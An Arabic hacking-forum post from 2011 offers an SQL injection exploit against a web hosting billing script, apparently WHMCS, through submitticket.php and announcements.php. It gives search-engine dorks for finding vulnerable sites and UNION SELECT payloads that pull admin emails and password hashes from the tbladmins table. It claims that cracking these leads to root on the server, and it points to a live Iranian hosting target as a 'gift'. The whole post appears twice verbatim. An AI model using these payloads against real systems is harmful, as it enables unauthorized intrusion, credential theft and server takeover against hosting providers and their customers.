قانون الهكر لايرحم
01-04-2011, 12:40 PM
السلام عليكم ورحمة الله ... !
كيفكم ياشباب ان شاء الله بخير .. !
ثغرة خطيرة بسكربت معروف عند الكل لكن ثغراته كانت برايفت تقريبا عند مجموعة من الهكر
وتم ترويت العديد من السيرفر خصوصا تحديث 2010 قبل صدور اللوكات الجديدة
الثغرة بسكربت وهم whm
هالسكربت يعتبر كـسيبنل للروت يتحكم من خلاله بالسيرفر باضافة حسابات جديدة وحذف وتعديل ووووو الخ
الثغرة هي من نوع SQL وهذا دليل لقوة هالنوع من الثغرات ... الاصابة عالية ... والملفات المصابة تقريبا 3
اولا دورك الثغرة
كود PHP:
allinurl: "/submitticket.php"
او
كود PHP:
allinurl: "/announcements.php"
الاستغلال
كود PHP:
submitticket.php?step=2&deptid=001 and 1=0 union all select
1,2,3,4,user****,6,7,8,password,10 from tbladmins--%20
او
كود PHP:
announcements.php?id=1%27%20and%201=0%20union%20al l%20sElect%201,2,concat
(email,0x3d,password),user****,5%20from%20tbladmin s--%20/
للمعلومية هالثغرة مثل ماقلت تستطيع ترويت السيرفر بدون لوكل وذلك لمجرد الحصول على باسوورد الروت الموجود في الكونفق مشفر بمقياس Md5 فك التشفير وادخل من البيوتي والى روت ...!
مثال على استضافة وسيرفر ايراني هدية لكم
كود PHP:
l%20sElect%201,2,concat%28email,0x3d,password%29,u ser****,5%20from%20tbladmins--%20/
الكلمة المشفره n ame
لوحة التحكم
ملاحظة لاصحاب الاستضافات العربية لترقيع الثغرة وضع جدار ناري على اللوحة
كيفكم ياشباب ان شاء الله بخير .. !
ثغرة خطيرة بسكربت معروف عند الكل لكن ثغراته كانت برايفت تقريبا عند مجموعة من الهكر
وتم ترويت العديد من السيرفر خصوصا تحديث 2010 قبل صدور اللوكات الجديدة
الثغرة بسكربت وهم whm
هالسكربت يعتبر كـسيبنل للروت يتحكم من خلاله بالسيرفر باضافة حسابات جديدة وحذف وتعديل ووووو الخ
الثغرة هي من نوع SQL وهذا دليل لقوة هالنوع من الثغرات ... الاصابة عالية ... والملفات المصابة تقريبا 3
اولا دورك الثغرة
كود PHP:
allinurl: "/submitticket.php"
او
كود PHP:
allinurl: "/announcements.php"
الاستغلال
كود PHP:
submitticket.php?step=2&deptid=001 and 1=0 union all select
1,2,3,4,user****,6,7,8,password,10 from tbladmins--%20
او
كود PHP:
announcements.php?id=1%27%20and%201=0%20union%20al l%20sElect%201,2,concat
(email,0x3d,password),user****,5%20from%20tbladmin s--%20/
للمعلومية هالثغرة مثل ماقلت تستطيع ترويت السيرفر بدون لوكل وذلك لمجرد الحصول على باسوورد الروت الموجود في الكونفق مشفر بمقياس Md5 فك التشفير وادخل من البيوتي والى روت ...!
مثال على استضافة وسيرفر ايراني هدية لكم
كود PHP:
l%20sElect%201,2,concat%28email,0x3d,password%29,u ser****,5%20from%20tbladmins--%20/
الكلمة المشفره n ame
لوحة التحكم
ملاحظة لاصحاب الاستضافات العربية لترقيع الثغرة وضع جدار ناري على اللوحة